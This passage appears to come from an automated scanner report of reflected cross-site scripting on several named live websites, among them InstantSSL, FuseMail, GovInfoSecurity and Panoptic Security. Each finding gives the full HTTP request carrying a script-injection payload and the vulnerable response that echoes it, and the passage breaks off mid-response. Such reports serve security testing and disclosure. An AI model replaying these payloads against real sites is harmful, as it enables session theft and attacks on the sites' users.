The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /products/SSLIdASignup1a?SID=NtcydAl8wNmXs5S2&product=342&days=90&loginName=&loginPassword=&loginErrorMessage=16f0f<script>alert(1)</script>780d4eeba57afd885 HTTP/1.1
Host: secure.instantssl.com
Connection: keep-alive
Referer: https://secure.instantssl.com/products/frontpage?area=SSL&product=342&days=90&ap=InstantSSL
Cache-Control: max-age=0
Origin: https://secure.instantssl.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316328656750r0.6942118240986019; __utmx=261615573.; __utmxx=261615573.; optimizelyBuckets=%7B%229298079%22%3A9298080%7D; __utma=261615573.129590781.1316328660.1316328660.1316362417.2; __utmb=261615573; __utmc=261615573; __utmz=261615573.1316362417.2.2.utmccn=(referral)|utmcsr=comodo.com|utmcct=/e-commerce/ssl-certificates/free-ssl-cert.php|utmcmd=referral

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:13:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Pragma: no-cache
Cache-Control: max-age=-1
Expires: -1
Content-Length: 18158

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>InstantSSL Security Services</title>
<link rel=stylesheet href=/css/css.css>
</head>
<body bgcolor=#99999
...[SNIP]...
<span class=error>16f0f<script>alert(1)</script>780d4eeba57afd885</span>
...[SNIP]...

1.14. https://secure.instantssl.com/products/SSLIdASignup1a [loginPassword parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.instantssl.com
Path:   /products/SSLIdASignup1a

Issue detail

The value of the loginPassword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef2a4"><script>alert(1)</script>caff33464a191e275 was submitted in the loginPassword parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /products/SSLIdASignup1a?SID=NtcydAl8wNmXs5S2&product=342&days=90&loginName=&loginPassword=ef2a4"><script>alert(1)</script>caff33464a191e275&loginErrorMessage= HTTP/1.1
Host: secure.instantssl.com
Connection: keep-alive
Referer: https://secure.instantssl.com/products/frontpage?area=SSL&product=342&days=90&ap=InstantSSL
Cache-Control: max-age=0
Origin: https://secure.instantssl.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316328656750r0.6942118240986019; __utmx=261615573.; __utmxx=261615573.; optimizelyBuckets=%7B%229298079%22%3A9298080%7D; __utma=261615573.129590781.1316328660.1316328660.1316362417.2; __utmb=261615573; __utmc=261615573; __utmz=261615573.1316362417.2.2.utmccn=(referral)|utmcsr=comodo.com|utmcct=/e-commerce/ssl-certificates/free-ssl-cert.php|utmcmd=referral

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:13:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Pragma: no-cache
Cache-Control: max-age=-1
Expires: -1
Content-Length: 18077

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>InstantSSL Security Services</title>
<link rel=stylesheet href=/css/css.css>
</head>
<body bgcolor=#99999
...[SNIP]...
<input type=password name=loginPassword maxlength=128 size=15 value="ef2a4"><script>alert(1)</script>caff33464a191e275" class=input2>
...[SNIP]...

1.15. http://www.fusemail.com/products/email-archiving/request-more-information/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fusemail.com
Path:   /products/email-archiving/request-more-information/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c801c'><script>alert(1)</script>215844610ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c801c\\\'><script>alert(1)</script>215844610ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/email-archiving/request-more-information/?utm_source=j2&utm_medium=crosssell&utm_campaign=enterprisepage&c801c'><script>alert(1)</script>215844610ea=1 HTTP/1.1
Host: www.fusemail.com
Proxy-Connection: keep-alive
Referer: http://home.j2.com/enterprise/enterprise.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
X-Pingback: http://www.fusemail.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 28034


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<form method='post' enctype='multipart/form-data' id='gform_1' action='/products/email-archiving/request-more-information/?utm_source=j2&utm_medium=crosssell&utm_campaign=enterprisepage&c801c\\\'><script>alert(1)</script>215844610ea=1'>
...[SNIP]...

1.16. http://www.fusemail.com/products/spam-and-virus-filtering/request-more-information/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fusemail.com
Path:   /products/spam-and-virus-filtering/request-more-information/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bee2a'><script>alert(1)</script>725db01c0f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bee2a\\\'><script>alert(1)</script>725db01c0f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/spam-and-virus-filtering/request-more-information/?utm_source=j2&utm_medium=crosssell&utm_campaign=enterprisepage&bee2a'><script>alert(1)</script>725db01c0f4=1 HTTP/1.1
Host: www.fusemail.com
Proxy-Connection: keep-alive
Referer: http://home.j2.com/enterprise/enterprise.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
X-Pingback: http://www.fusemail.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 27374


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<form method='post' enctype='multipart/form-data' id='gform_7' action='/products/spam-and-virus-filtering/request-more-information/?utm_source=j2&utm_medium=crosssell&utm_campaign=enterprisepage&bee2a\\\'><script>alert(1)</script>725db01c0f4=1'>
...[SNIP]...

1.17. http://www.govinfosecurity.com/articles.php [art_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.govinfosecurity.com
Path:   /articles.php

Issue detail

The value of the art_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88745"-alert(1)-"cc145464d1f was submitted in the art_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles.php?art_id=406788745"-alert(1)-"cc145464d1f HTTP/1.1
Host: www.govinfosecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:11:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=fvfq7uh4sorob9bergs9g45t37
Connection: close
Content-Type: text/html
Content-Length: 77596


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
(function (JQ1) {
   JQ1("a#my-link-popup1").click(function () {
       JQ1.floatbox({
           ajax: {
               url: "http://www.govinfosecurity.com/popup.php?rdu=http://www.govinfosecurity.com/articles.php?art_id=406788745"-alert(1)-"cc145464d1f", // request url
               params: "", //post parameters
               before: "<p align='center'>
...[SNIP]...

1.18. http://www.govinfosecurity.com/articles.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.govinfosecurity.com
Path:   /articles.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3be59"-alert(1)-"5e980f04183 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles.php?art_id=4067&3be59"-alert(1)-"5e980f04183=1 HTTP/1.1
Host: www.govinfosecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:11:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=fvfq7uh4sorob9bergs9g45t37
Connection: close
Content-Type: text/html
Content-Length: 94708


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
function (JQ1) {
   JQ1("a#my-link-popup1").click(function () {
       JQ1.floatbox({
           ajax: {
               url: "http://www.govinfosecurity.com/popup.php?rdu=http://www.govinfosecurity.com/articles.php?art_id=4067&3be59"-alert(1)-"5e980f04183=1", // request url
               params: "", //post parameters
               before: "<p align='center'>
...[SNIP]...

1.19. http://www.govinfosecurity.com/articles.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.govinfosecurity.com
Path:   /articles.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ceb4a'><script>alert(1)</script>ae00085e7e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles.php?art_id=4067&ceb4a'><script>alert(1)</script>ae00085e7e2=1 HTTP/1.1
Host: www.govinfosecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:11:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=fvfq7uh4sorob9bergs9g45t37
Connection: close
Content-Type: text/html
Content-Length: 94603


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type='hidden' name='redirectTo' value='http://www.govinfosecurity.com/articles.php?art_id=4067&ceb4a'><script>alert(1)</script>ae00085e7e2=1'>
...[SNIP]...

1.20. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser [contactFirstName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/PanController/doRegisterUser

Issue detail

The value of the contactFirstName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a395b"><script>alert(1)</script>b302652662e was submitted in the contactFirstName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
Content-Length: 401
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

partner=Comodo&required_fields=userName%7Cpassword%7CpasswordValueConfirm%7CemailAddress%7CsecurityAnswer&merchantName=234234&salutation=Mr.&contactFirstName=23434a395b"><script>alert(1)</script>b302652662e&contactLastName=234234&userName=24234&passwordValue=123456al&passwordValueConfirm=123456al&emailAddress=46465&phoneNumber=46456&securityQuestions=What+was+the+name+of+your+first+school%3F&securityAns
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:50 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<input type="text" name="contactFirstName" value="23434a395b"><script>alert(1)</script>b302652662e" size="30" maxlength="30" tabindex="6"/>
...[SNIP]...

1.21. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser [contactLastName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/PanController/doRegisterUser

Issue detail

The value of the contactLastName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71713"><script>alert(1)</script>5f59f30b6ec was submitted in the contactLastName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
Content-Length: 401
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

partner=Comodo&required_fields=userName%7Cpassword%7CpasswordValueConfirm%7CemailAddress%7CsecurityAnswer&merchantName=234234&salutation=Mr.&contactFirstName=23434&contactLastName=23423471713"><script>alert(1)</script>5f59f30b6ec&userName=24234&passwordValue=123456al&passwordValueConfirm=123456al&emailAddress=46465&phoneNumber=46456&securityQuestions=What+was+the+name+of+your+first+school%3F&securityAnswer=546456&cbox=checkbo
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:52 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<input type="text" name="contactLastName" value="23423471713"><script>alert(1)</script>5f59f30b6ec" size="30" maxlength="30" tabindex="7"/>
...[SNIP]...

1.22. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser [emailAddress parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/PanController/doRegisterUser

Issue detail

The value of the emailAddress request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 754ec"><script>alert(1)</script>e9c997c9693 was submitted in the emailAddress parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
Content-Length: 401
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

partner=Comodo&required_fields=userName%7Cpassword%7CpasswordValueConfirm%7CemailAddress%7CsecurityAnswer&merchantName=234234&salutation=Mr.&contactFirstName=23434&contactLastName=234234&userName=24234&passwordValue=123456al&passwordValueConfirm=123456al&emailAddress=46465754ec"><script>alert(1)</script>e9c997c9693&phoneNumber=46456&securityQuestions=What+was+the+name+of+your+first+school%3F&securityAnswer=546456&cbox=checkbox&path=Register

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:56 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<input type="text" name="emailAddress" value="46465754ec"><script>alert(1)</script>e9c997c9693" size="32" maxlength="128" tabindex="12"/>
...[SNIP]...

1.23. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser [merchantName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/PanController/doRegisterUser

Issue detail

The value of the merchantName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d284"><script>alert(1)</script>f9b1a2c229e was submitted in the merchantName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
Content-Length: 401
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

partner=Comodo&required_fields=userName%7Cpassword%7CpasswordValueConfirm%7CemailAddress%7CsecurityAnswer&merchantName=2342347d284"><script>alert(1)</script>f9b1a2c229e&salutation=Mr.&contactFirstName=23434&contactLastName=234234&userName=24234&passwordValue=123456al&passwordValueConfirm=123456al&emailAddress=46465&phoneNumber=46456&securityQuestions=What+was+the+na
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:47 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<input type="text" name="merchantName" value="2342347d284"><script>alert(1)</script>f9b1a2c229e" size="48" maxlength="48" tabindex="1"/>
...[SNIP]...

1.24. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser [passwordValue parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/PanController/doRegisterUser

Issue detail

The value of the passwordValue request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2158"><script>alert(1)</script>bc4664158db was submitted in the passwordValue parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
Content-Length: 401
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

partner=Comodo&required_fields=userName%7Cpassword%7CpasswordValueConfirm%7CemailAddress%7CsecurityAnswer&merchantName=234234&salutation=Mr.&contactFirstName=23434&contactLastName=234234&userName=24234&passwordValue=123456ale2158"><script>alert(1)</script>bc4664158db&passwordValueConfirm=123456al&emailAddress=46465&phoneNumber=46456&securityQuestions=What+was+the+name+of+your+first+school%3F&securityAnswer=546456&cbox=checkbox&path=Register

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:53 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<input type="password" name="passwordValue" value="123456ale2158"><script>alert(1)</script>bc4664158db" size="32" maxlength="32" tabindex="10"/>
...[SNIP]...

1.25. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser [passwordValueConfirm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/PanController/doRegisterUser

Issue detail

The value of the passwordValueConfirm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae3ca"><script>alert(1)</script>82329d9dd11 was submitted in the passwordValueConfirm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
Content-Length: 401
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

partner=Comodo&required_fields=userName%7Cpassword%7CpasswordValueConfirm%7CemailAddress%7CsecurityAnswer&merchantName=234234&salutation=Mr.&contactFirstName=23434&contactLastName=234234&userName=24234&passwordValue=123456al&passwordValueConfirm=123456alae3ca"><script>alert(1)</script>82329d9dd11&emailAddress=46465&phoneNumber=46456&securityQuestions=What+was+the+name+of+your+first+school%3F&securityAnswer=546456&cbox=checkbox&path=Register

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:55 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<input type="password" name="passwordValueConfirm" value="123456alae3ca"><script>alert(1)</script>82329d9dd11" size="32" maxlength="32" tabindex="11"/>
...[SNIP]...

1.26. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser [phoneNumber parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/PanController/doRegisterUser

Issue detail

The value of the phoneNumber request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df5d5"><script>alert(1)</script>3c595ba12de was submitted in the phoneNumber parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
Content-Length: 401
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

partner=Comodo&required_fields=userName%7Cpassword%7CpasswordValueConfirm%7CemailAddress%7CsecurityAnswer&merchantName=234234&salutation=Mr.&contactFirstName=23434&contactLastName=234234&userName=24234&passwordValue=123456al&passwordValueConfirm=123456al&emailAddress=46465&phoneNumber=46456df5d5"><script>alert(1)</script>3c595ba12de&securityQuestions=What+was+the+name+of+your+first+school%3F&securityAnswer=546456&cbox=checkbox&path=Register

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:57 GMT
Server: GlassFish Server Open Source Edition 3.1
